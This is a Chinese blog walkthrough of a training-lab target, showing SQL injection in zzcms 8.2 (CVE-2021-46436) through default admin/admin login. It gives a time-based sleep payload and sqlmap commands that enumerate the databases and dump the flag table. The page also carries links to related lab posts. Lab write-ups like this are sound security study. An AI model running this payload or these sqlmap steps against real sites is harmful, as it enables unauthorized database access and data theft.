zzcms注入(CVE-2021-46436)

最新推荐文章于 2024-06-20 18:31:22 发布
最新推荐文章于 2024-06-20 18:31:22 发布
阅读量194 收藏 1
点赞数
分类专栏: 春秋云镜 文章标签: 安全 网络安全 php web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_69432323/article/details/131890328
版权

靶标介绍:

站长招商网内容管理系统简称 ZZCMS,由ZZCMS团队开发,融入数据库优化,内容缓存,AJAX等技术,使网站的安全性 、稳定性 、负载能力得到可靠保障。源码开放,功能模块独立,便于二次开发。 zzcms8.2中在admin/ad_manage.php存在sql注入漏洞

漏洞复现:

根据这位大佬的分析找到的注入点https://github.com/xunyang1/ZZCMS/issues/1
进入场景后,根据“靶标介绍”,找到后台地址。弱口令admin,admin
QQ截图20230723111814.png
在登录成功后访问到页面,然后访问存在sql注入的位置,并使用burpsuite抓包,尝试构造poc

?b=A%27%20%26%26%20sleep(5)%23

image.png
发现响应时间被延长到了6秒,说明注入点存在,将数据包保存下来,使用sqlmap来进行注入

sqlmap -r 101.txt -p b

image.png
爆数据库

sqlmap -r 101.txt -p b -dbs

image.png
爆表

sqlmap -r 101.txt -p b  -D zzcms  --tables

image.png
找到flag表,将数据爆出来

 sqlmap -r 101.txt -p b  -D zzcms -T flag --dump

image.png

祤域
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Ares-X#VulWiki#(CVE-2018-14961)Zzcms 8.3 前台sql注入1
07-25
一、漏洞简介 二、漏洞影响 三、复现过程
zzcms,招商网cms,专业做招商网,zzcms专业做招商网zzcms201910.zip
01-15
ZZCMS 用项目加盟型模板,可快速搭建像 jiameng.com项目加盟网,u88.com,3158.cn,28.com,78.cn 等这种类型的商机网,致富网的程序、源码。
春秋云镜 CVE-2021-40282
qq_22002773的博客
07-29 251
CVE-2021-40282
CVE-2021-40280
m0_51674437的博客
07-28 379
CVE-2021-40280漏洞复现
[春秋云镜]CVE-2021-40282靶场
niubi707的博客
12-04 5532
CVE-2021-40282靶场通关记录
春秋云境:CVE-2021-40282(zzcms注入
m0_65712192的博客
08-22 337
站长招商网内容管理系统简称 ZZCMS,由ZZCMS团队开发,融入数据库优化,内容缓存,AJAX等技术,使网站的安全性 、稳定性 、负载能力得到可靠保障。源码开放,功能模块独立,便于二次开发。 zzcms8.3中dl/dl_download.php存在sql注入
CVE-2021-46436
m0_51674437的博客
07-27 113
CVE-2021-46436漏洞复现
春秋云镜 CVE-2021-40280
qq_22002773的博客
07-30 329
春秋云镜 CVE-2021-40280
[春秋云镜]CVE-2020-19960,CVE-2020-19961
niubi707的博客
12-03 5871
zz cms 2019 GETSHELL 春秋靶场CVE-2020-19960.CVE-2020-19961通关
【春秋云境】CVE-2021-40282靶场记录
2301_78019493的博客
05-19 723
CVE-2021-40282】该靶场存在sql注入但我未找到注入点,我用文件上传达到目的
春秋云境CVE-2021-40282
2303_76653367的博客
05-11 352
站长招商网内容管理系统简称 ZZCMS,由ZZCMS团队开发,融入数据库优化,内容缓存,AJAX等技术,使网站的安全性 、稳定性 、负载能力得到可靠保障。源码开放,功能模块独立,便于二次开发。zzcms8.3中dl/dl_download.php存在sql注入。3.进入后,发现文件选项栏能够上传文件,就试一试上传一句话木马。这道题也是让我大开眼界了,第一次做这种类型的,参考wp。4.上传木马,抓包得到文件存放地址5.2.进入后台 /admin。密码为admin/admin。
bluecms-zzcms.rar
06-09
bluecms-zzcms两款适合新手的源代码审计,代码审计入门之BlueCMS v1.6 sp1,适合练手的ZZCMS8.2漏洞
zzcms网站管理系统 v1.0 sp3.rar
07-06
ZZCMS是一款小巧,高效,人性化的企业建站程序. 目前具有模块:单页、文章、产品、下载、友情连接、留言本、伪原创、记录蜘蛛等功能 采用缓存技术让速度更快 栏目为多级分类 留言可在后台设置是否通过审核的留言 ...
zzcms网站管理系统 v1.0.rar
07-06
ZZCMS是一个免费的开源的网站管理系统,目前功能主要用于个人网站建设和企业网站建设,欢迎你的加入,请提出你宝贵的意见,在此感谢! 可用于建设企业网站及个人网站建设 采用PHP MYSQL开发 开发环境:...
VirtualBox 7.0.18 安装在D盘文件下,会提示目录不安全等信息,不让安装
qq_43684686的博客
06-17 323
VirtualBox 7.0.18 安装在D盘文件下,会提示目录不安全等信息,不让安装。重新执行安装程安装到 d:\a-vm。在D盘新建一个文件夹a-vm,
在物联网设备安全中,如何有效进行固件更新管理?
2403_84237550的博客
06-17 406
• 更新后持续监控设备状态,评估更新效果,及时发现并解决更新带来的新问题。在物联网设备安全中,有效进行固件更新管理是一个关键环节,涉及到多个步骤和策略,以确保更新过程既安全又高效。• 在部署固件更新前,进行全面的安全验证和兼容性测试,确保更新包的来源可靠,未被篡改,并且不会影响设备的正常运行。• 记录每次固件更新的详细信息,包括更新时间、版本号、更新内容和操作人员等,以便追溯和审计。• 加强用户对固件更新重要性的认识,教育用户如何正确执行和验证更新,提升整体安全意识。
如何确保数据跨域交换安全、合规、可追溯性?
文件数据安全交换
06-14 582
飞驰云联是中国领先的数据安全传输解决方案提供商,长期专注于安全可控、性能卓越的数据传输技术和解决方案,公司产品和方案覆盖了跨网跨区域的数据安全交换、供应链数据安全传输、数据传输过程的防泄漏、FTP的增强和国产化替代、文件传输自动化和传输集成等各种数据传输场景。针对上述问题,推荐采用统一的数据跨域交换管控平台,如飞驰云联《Ftrans MDE多区域文件交换系统》,帮助企业构建统一、安全、高效的数据跨域交换通道,确保数据在多地理区域、多网络区域、多分支机构间准确、高效地传输。问题:明文传输,容易被截获和窃取;
【启明智显产品分享】Model3工业级HMI芯片详解系列专题(三):安全、稳定、高防护
ami82的博客
06-20 364
Model3芯片具备高达8KV的ESD HBM防护,在恶劣的工业环境中能够抵抗各种电磁干扰,提升系统可靠性;Model3芯片支持高精度电子脉宽调制(EPWM)控制,能够满足复杂电机控制和精细过程控制的需要,在控制应用中更加精准;Model3芯片内置4线电阻触摸屏驱动,为用户提供便捷的交互途径,降低了外围BOM成本。
企业防盗版,如何保障上网安全
最新发布
shenxinda_lu的博客
06-20 140
当需要访问互联网时,用户在隔离沙盒内进行操作,确保主机与互联网物理隔离,只有沙盒能够访问互联网,且沙盒与本机隔离。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值